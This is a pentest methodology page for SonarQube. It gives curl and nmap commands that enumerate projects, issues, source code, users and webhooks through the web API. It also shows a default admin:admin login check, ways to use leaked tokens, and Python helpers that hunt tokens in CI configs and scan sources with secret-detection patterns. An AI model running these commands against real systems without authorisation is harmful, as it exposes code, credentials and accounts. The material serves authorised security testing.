
SonarQube

Default Port: 9000

SonarQube is a source code quality and security analysis platform. In pentests, an exposed SonarQube instance can reveal project names, vulnerable code paths, source snippets, developer accounts, CI tokens, webhooks, and repository integrations. Everything below goes through the JSON web API under /api/. The same endpoints serve anonymous and authenticated callers, so the first question is always what the anonymous role is allowed to see.

Connect

Using Web Browser

Check the UI for anonymous project visibility (a project list shown without logging in) and for the authentication methods offered on the login page (local accounts, LDAP, SAML, GitHub/GitLab).

http://target.com:9000
https://sonarqube.target.com
https://sonar.target.com

Using curl

Use API endpoints to fingerprint the instance and test anonymous access. api/system/status returns the server status (UP, STARTING, DB_MIGRATION_NEEDED) together with the version; api/server/version returns only the version string.

curl -I http://target.com:9000/
curl -s http://target.com:9000/api/system/status
curl -s http://target.com:9000/api/server/version

Using API Token

Leaked SonarQube tokens are commonly found in CI variables and scanner configs. The token is sent as the Basic-auth username with an empty password, which is why the trailing colon in -u TOKEN: matters; recent releases also accept it as a Bearer token in the Authorization header.

curl -u TOKEN: http://target.com:9000/api/authentication/validate
curl -u TOKEN: http://target.com:9000/api/projects/search
curl -u TOKEN: http://target.com:9000/api/users/current

Using sonar-scanner

Scanner configuration (sonar-project.properties, CI job variables such as SONAR_TOKEN and SONAR_HOST_URL) often exposes host URLs, project keys, and tokens. sonar.login is the legacy property name; scanners shipped with SonarQube 10 expect sonar.token and warn on the old one. Running the scanner submits an analysis and creates or updates the project on the server, so validate a token with read-only API calls unless the engagement allows writes.

sonar-scanner \
-Dsonar.host.url=http://target.com:9000 \
-Dsonar.projectKey=project-key \
-Dsonar.login=TOKEN

Recon

Service Detection with Nmap

Scan the default port and common reverse proxy ports.

nmap -p 80,443,9000,9443 -sV target.com
nmap -p 80,443,9000 --script http-title,http-headers target.com
nmap -p 443,9443 --script ssl-cert,ssl-enum-ciphers target.com

Product Fingerprinting

Version and status endpoints help confirm SonarQube.

curl -s http://target.com:9000/api/system/status
curl -s http://target.com:9000/api/server/version
curl -s http://target.com:9000/api/webservices/list | head
httpx -u http://target.com:9000 -title -tech-detect -status-code

Authentication Review

Check anonymous session behavior before credential testing. With "Force user authentication" enabled, anonymous requests to api/users/current are refused with 401; with it disabled, the response reports isLoggedIn false and everything granted to the Anyone group can be read without credentials.

curl -I http://target.com:9000/sessions/new
curl -s http://target.com:9000/api/authentication/validate
curl -s http://target.com:9000/api/users/current

API Discovery

api/webservices/list returns the full API index, including each action's parameters and which actions are flagged internal, so it doubles as a map of what this particular version exposes.

curl -s http://target.com:9000/api/webservices/list | jq
curl -s http://target.com:9000/api/webservices/list | grep -i "projects\|issues\|components\|sources"

Enumeration

Project Enumeration

Anonymous project access is the highest-value first check. Results are paged with p and ps (ps up to 500), so a bare call shows only the first 100 projects.

curl -s http://target.com:9000/api/projects/search | jq
curl -s "http://target.com:9000/api/projects/search?q=api" | jq
curl -s "http://target.com:9000/api/components/search?qualifiers=TRK" | jq
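The token authentication described under "Using API Token" and the paging that projects/search applies, as an added example that is not code from the page or from SonarSource. The host, the token and the sample project list are constructed; the fake transport stands in for a live server so the script runs offline, and the ps limit of 500 and the 10,000-result cap on issues/search are stated from SonarQube's documented paging behaviour.

```python
"""Added example, not code from the page or from SonarSource: a minimal
SonarQube web API helper that sends a token the way `curl -u TOKEN:` does
and walks paged results. Host, token and the project list are constructed."""
import base64
import json
import urllib.parse
import urllib.request


def auth_header(token):
    """Token as Basic-auth username with an empty password (what curl -u TOKEN: sends)."""
    raw = base64.b64encode(f"{token}:".encode()).decode()
    return {"Authorization": f"Basic {raw}"}


def http_get(base_url, path, params, token=None):
    """Live transport: GET base_url/path?params and decode the JSON body."""
    url = f"{base_url.rstrip('/')}/{path}?{urllib.parse.urlencode(params)}"
    req = urllib.request.Request(url, headers=auth_header(token) if token else {})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.loads(resp.read().decode())


def paged(fetch, path, items_key, page_size=500, **params):
    """Yield every item of a p/ps-paged endpoint until paging.total is reached.

    fetch(path, params) must return the decoded JSON. A bare curl only gets the
    first page (default ps=100); ps tops out at 500. api/issues/search refuses to
    page past 10,000 results, so slice big projects by component or severity."""
    page, seen = 1, 0
    while True:
        body = fetch(path, dict(params, p=page, ps=page_size))
        items = body.get(items_key, [])
        yield from items
        seen += len(items)
        total = body.get("paging", {}).get("total", seen)
        if not items or seen >= total:
            return
        page += 1


def list_projects(fetch, page_size=500):
    """(key, name, visibility) for every project the caller is allowed to see."""
    return [(p["key"], p["name"], p.get("visibility"))
            for p in paged(fetch, "api/projects/search", "components", page_size)]


# Constructed stand-in for a live server so the example runs offline.
SAMPLE_PROJECTS = [
    {"key": "billing-api", "name": "Billing API", "visibility": "public"},
    {"key": "auth-service", "name": "Auth Service", "visibility": "private"},
    {"key": "web-frontend", "name": "Web Frontend", "visibility": "public"},
    {"key": "infra-terraform", "name": "Infra Terraform", "visibility": "private"},
    {"key": "legacy-monolith", "name": "Legacy Monolith", "visibility": "public"},
]


def fake_fetch(projects=SAMPLE_PROJECTS):
    """Serve `projects` in pages the way api/projects/search does; counts requests."""
    def fetch(path, params):
        fetch.calls += 1
        p, ps = params["p"], params["ps"]
        return {"paging": {"pageIndex": p, "pageSize": ps, "total": len(projects)},
                "components": projects[(p - 1) * ps:p * ps]}
    fetch.calls = 0
    return fetch


if __name__ == "__main__":
    # Live use (hypothetical host/token):
    # live = lambda path, params: http_get("http://target.com:9000", path, params, "TOKEN")
    fetch = fake_fetch()
    for key, name, vis in list_projects(fetch, page_size=2):
        print(f"{key:20} {vis:8} {name}")
    print(f"{fetch.calls} page requests")
```

Swap fake_fetch for the live lambda to run it against a real instance; the same paged() helper works for api/issues/search (items_key "issues") and api/components/tree (items_key "components") with their own query parameters passed as keywords.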

Branch and Measure Enumeration

Branches and measures reveal release flows and the weakest project areas. Multiple branches per project exist only in the commercial editions; Community Edition analyses a single branch, so project_branches/list returns one entry there. components/show returns the project's tags, visibility, and last analysis date.

curl -s "http://target.com:9000/api/project_branches/list?project=project-key" | jq
curl -s "http://target.com:9000/api/components/show?component=project-key" | jq
curl -s "http://target.com:9000/api/measures/component?component=project-key&metricKeys=vulnerabilities,bugs,code_smells,ncloc" | jq

Issue Enumeration

Issues may disclose vulnerable files, rule names, severities, and remediation notes. issues/search returns at most 10,000 results per query, so split large projects by component, severity, or type. Security hotspots are served by their own endpoint.

curl -s "http://target.com:9000/api/issues/search?componentKeys=project-key&types=VULNERABILITY" | jq
curl -s "http://target.com:9000/api/issues/search?componentKeys=project-key&severities=CRITICAL,BLOCKER" | jq
curl -s "http://target.com:9000/api/hotspots/search?projectKey=project-key" | jq

Source Enumeration

sources/show returns the file as a JSON array of [line, text] pairs and sources/raw returns the plain text. Both require the "See Source Code" project permission, which is granted separately from Browse, so issue metadata may be readable while the code itself is not.

curl -s "http://target.com:9000/api/components/tree?component=project-key&qualifiers=FIL" | jq
curl -s "http://target.com:9000/api/sources/show?key=project-key:path/to/file.java" | jq
curl -i "http://target.com:9000/api/sources/raw?key=project-key:path/to/file.java"

User and Group Enumeration

User data helps identify developers, admins, and service accounts. users/search returns emails and external identities only to administrators or for the caller's own account, and permissions/users requires the Administer System permission, so expect 401 or 403 on these when anonymous or low-privileged.

curl -s "http://target.com:9000/api/users/search" | jq
curl -s "http://target.com:9000/api/user_groups/search" | jq
curl -s "http://target.com:9000/api/permissions/users?permission=admin" | jq

Attack Vectors

Anonymous Project Access

Anonymous visibility can leak code intelligence without credentials.

curl -s http://target.com:9000/api/projects/search | jq
curl -s "http://target.com:9000/api/issues/search?types=VULNERABILITY" | jq
curl -i "http://target.com:9000/api/sources/show?key=project-key:path/to/file"

Default Credentials

Check weak local credentials only when in scope. admin:admin is the installation default; current versions force a password change at first login, so a working admin:admin normally means a never-configured or freshly reset instance. A successful check returns {"valid":true}.

# Common legacy default:
# admin:admin
curl -u admin:admin http://target.com:9000/api/authentication/validate

Leaked Tokens

Tokens can provide project, issue, source, or admin access depending on their type. Since SonarQube 9.6 the prefix tells you which: squ_ user tokens act with the owning user's permissions, while sqa_ global analysis tokens and sqp_ project analysis tokens can only submit analyses and will not read projects, issues, or sources. Tokens from older versions are unprefixed 40-character hex strings. Search scanner configs, CI variable files, and shell histories for them.

rg -n 'sonar.login|sonar.token|SONAR_TOKEN|sonar.host.url' .
curl -u TOKEN: http://target.com:9000/api/users/current
curl -u TOKEN: http://target.com:9000/api/projects/search
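The token hunt above, as an added example that is not code from the page or from SonarSource: it scans configuration text for SonarQube tokens and host URLs and classifies each token by prefix so you know what it can do before spending it on the API. The config text is constructed; the assumption that a token is a sq?_ prefix plus 40 hex characters (or a bare 40-hex string from a pre-9.6 instance) is stated in the code, and bare hex is only reported when the line mentions sonar, token, or login, since a 40-hex string in a CI file is otherwise more likely a git commit SHA.

```python
"""Added example, not code from the page or from SonarSource: find SonarQube
tokens and host URLs in scanner/CI configuration text and classify each token
by its prefix. The configuration text below is constructed."""
import re

# Assumption: tokens are a 4-char prefix plus 40 hex chars (SonarQube 9.6+),
# or a bare 40-hex string minted by an older version.
TOKEN_RE = re.compile(r"\b(sq[uap]_[0-9a-f]{40}|[0-9a-f]{40})\b")
HOST_RE = re.compile(r"sonar[._]host[._]url\s*[=:]\s*['\"]?(\S+?)['\"]?\s*$", re.I | re.M)
# Bare 40-hex only counts when the line looks SonarQube-related (git SHAs are 40 hex too).
CONTEXT_RE = re.compile(r"sonar|token|login", re.I)

KIND_BY_PREFIX = {
    "squ_": "user",              # acts with the owning user's permissions
    "sqa_": "global analysis",   # may submit analyses for any project, cannot read results
    "sqp_": "project analysis",  # may submit analyses for one project only
}


def classify(token):
    """Token kind from its prefix; unprefixed tokens predate 9.6 and are user tokens."""
    for prefix, kind in KIND_BY_PREFIX.items():
        if token.startswith(prefix):
            return kind
    return "legacy"


def next_step(kind):
    """Read-only way to confirm what a token of this kind is worth."""
    if kind in ("user", "legacy"):
        return "curl -u TOKEN: http://target.com:9000/api/users/current"
    return "analysis-only: expect 401/403 on read endpoints; usable with sonar-scanner"


def find_tokens(text):
    hits = []
    for n, line in enumerate(text.splitlines(), start=1):
        for m in TOKEN_RE.finditer(line):
            token = m.group(1)
            kind = classify(token)
            if kind == "legacy" and not CONTEXT_RE.search(line):
                continue
            hits.append({"line": n, "token": token, "kind": kind, "next": next_step(kind)})
    return hits


def find_hosts(text):
    """sonar.host.url / SONAR_HOST_URL values, in file order."""
    return HOST_RE.findall(text)


# Constructed scanner and CI configuration; the tokens are made up.
SAMPLE_CONFIG = """\
# sonar-project.properties (constructed)
sonar.host.url=http://target.com:9000
sonar.projectKey=billing-api
sonar.login=sqp_5f2a9c1d8e7b6a5f4e3d2c1b0a9f8e7d6c5b4a39

# .gitlab-ci.yml fragment (constructed)
variables:
  SONAR_HOST_URL: "https://sonar.target.com"
  SONAR_TOKEN: "squ_0123456789abcdef0123456789abcdef01234567"
script:
  - git checkout 9f8e7d6c5b4a392817f6e5d4c3b2a1908f7e6d5c
  - sonar-scanner -Dsonar.token=$SONAR_TOKEN
"""

if __name__ == "__main__":
    for host in find_hosts(SAMPLE_CONFIG):
        print("host:", host)
    for hit in find_tokens(SAMPLE_CONFIG):
        print(f"line {hit['line']}: {hit['kind']:17} {hit['token'][:8]}...  -> {hit['next']}")
```

Point it at real files with find_tokens(open(path).read()); the git checkout line in the sample is there to show the SHA filter doing its job.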

Source and Secret Exposure

Search accessible issues and source snippets for secrets. Grepping the raw JSON is fine for a spot check, but it loses line numbers and matches JSON-escaped text; for anything systematic, parse the sources array and inspect each line.

curl -s "http://target.com:9000/api/issues/search?componentKeys=project-key" | grep -Ei 'password|secret|token|apikey'
curl -s "http://target.com:9000/api/sources/show?key=project-key:path/to/file" | grep -Ei 'password|secret|token|apikey'
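The secret search above, applied to the actual shapes that sources/show and sources/raw return (see "Source Enumeration"), as an added example that is not code from the page or from SonarSource. The two responses are constructed samples; the component keys are hypothetical. The scanner reports key and line number, prefers the most specific rule that matches, and drops templated or filler values so that `${...}` placeholders and `<fill-in>` strings do not end up in the findings.

```python
"""Added example, not code from the page or from SonarSource: parse what
api/sources/show and api/sources/raw return and scan each line for
secret-looking content, reporting component key and line number.
The responses below are constructed samples."""
import json
import re

# Specific rules first, the generic assignment rule last, so a line gets the
# most precise label that matches it.
SECRET_RULES = [
    ("sonarqube token", re.compile(r"\bsq[uap]_[0-9a-f]{40}\b")),
    ("aws access key id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("private key block", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")),
    ("basic auth in url", re.compile(r"[a-z][a-z0-9+.-]*://[^/\s:@]+:[^/\s@]+@", re.I)),
    ("generic credential assignment", re.compile(
        r"(?i)(password|passwd|pwd|secret|token|api[_-]?key)\s*[:=]\s*['\"][^'\"]{6,}['\"]")),
]
# Templated or obviously filler values: not worth reporting as secrets.
PLACEHOLDER_RE = re.compile(r"\$\{|\$\(|<[^>]+>|changeme|xxx", re.I)


def lines_from_show(body):
    """api/sources/show -> {"sources": [[lineNumber, text], ...]}"""
    return [(int(n), t) for n, t in body["sources"]]


def lines_from_raw(text):
    """api/sources/raw -> the file as plain text"""
    return list(enumerate(text.splitlines(), start=1))


def scan(key, lines):
    hits = []
    for n, text in lines:
        rule = next((name for name, rx in SECRET_RULES if rx.search(text)), None)
        if rule is None or PLACEHOLDER_RE.search(text):
            continue
        hits.append({"key": key, "line": n, "rule": rule, "text": text.strip()})
    return hits


def scan_show(key, body_text):
    return scan(key, lines_from_show(json.loads(body_text)))


def scan_raw(key, text):
    return scan(key, lines_from_raw(text))


# Constructed api/sources/show response for a hypothetical Java config class.
SAMPLE_SHOW = json.dumps({"sources": [
    [1, "package com.target.billing.config;"],
    [2, ""],
    [3, "public class DbConfig {"],
    [4, "    static final String DB_USER = \"billing\";"],
    [5, "    static final String DB_PASSWORD = \"Sup3rS3cret!\";"],
    [6, "    static final String API_KEY = System.getenv(\"API_KEY\");"],
    [7, "    // password = \"${DB_PASSWORD}\" is resolved at deploy time"],
    [8, "    static final String S3_KEY = \"AKIAIOSFODNN7EXAMPLE\";"],
    [9, "}"],
]})

# Constructed api/sources/raw response for a hypothetical settings script.
SAMPLE_RAW = "\n".join([
    "import os",
    "SONAR_TOKEN = 'squ_0123456789abcdef0123456789abcdef01234567'",
    "DB_URL = 'postgres://app:Hunter2pass@db.internal:5432/billing'",
    "SMTP_PASSWORD = '<fill-in>'",
])

if __name__ == "__main__":
    findings = scan_show("billing-api:src/main/java/com/target/billing/config/DbConfig.java", SAMPLE_SHOW)
    findings += scan_raw("billing-api:scripts/settings.py", SAMPLE_RAW)
    for f in findings:
        print(f"{f['key']}:{f['line']}  [{f['rule']}]  {f['text']}")
```

For a live target, feed scan_show the body of api/sources/show and scan_raw the body of api/sources/raw for each key listed by api/components/tree?qualifiers=FIL; the rule list is deliberately short and meant to be extended with whatever secret formats the engagement's stack uses.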

Webhook and Integration Exposure

Administrative access may reveal CI/CD and repository integrations. webhooks/list and settings/values both require the Administer permission (on the project, or globally when no project is given), and webhook URLs often embed build-server hostnames or basic-auth credentials.

curl -u TOKEN: "http://target.com:9000/api/webhooks/list?project=project-key" | jq
curl -u TOKEN: "http://target.com:9000/api/settings/values?component=project-key" | jq

Post-Exploitation

Project Impact Review

Summarize visible projects, branches, issues, and source access.

curl -u TOKEN: http://target.com:9000/api/projects/search > sonarqube-projects.json
curl -u TOKEN: "http://target.com:9000/api/issues/search?types=VULNERABILITY" > sonarqube-vulnerabilities.json

CI/CD Pivot Review

Project names, scanner configs, and webhooks often point to build systems.

rg -n 'jenkins|gitlab|github|azure|bitbucket|nexus|artifactory|registry' sonarqube-*.json
curl -u TOKEN: "http://target.com:9000/api/webhooks/list" | jq

Account Review

Document users, groups, and admin permissions.

curl -u TOKEN: "http://target.com:9000/api/users/search" > sonarqube-users.json
curl -u TOKEN: "http://target.com:9000/api/user_groups/search" > sonarqube-groups.json
curl -u TOKEN: "http://target.com:9000/api/permissions/users?permission=admin" > sonarqube-admins.json

Useful Tools

Tool            Purpose
----            -------
curl            API and auth testing
jq              JSON parsing
httpx           Web fingerprinting
sonar-scanner   Scanner config validation
rg              Token and config searching
nmap            Port and TLS checks

Security Misconfigurations

Misconfiguration                            Risk
----------------                            ----
Anonymous project access                    Project and issue disclosure
Source endpoints exposed                    Code and secret leakage
Default or weak local credentials           Administrative access
Leaked scanner tokens                       API access through CI secrets
Broad project permissions                   Cross-team data exposure
Webhooks visible to low-privilege users     CI/CD integration leakage
Outdated SonarQube                          Known vulnerability exposure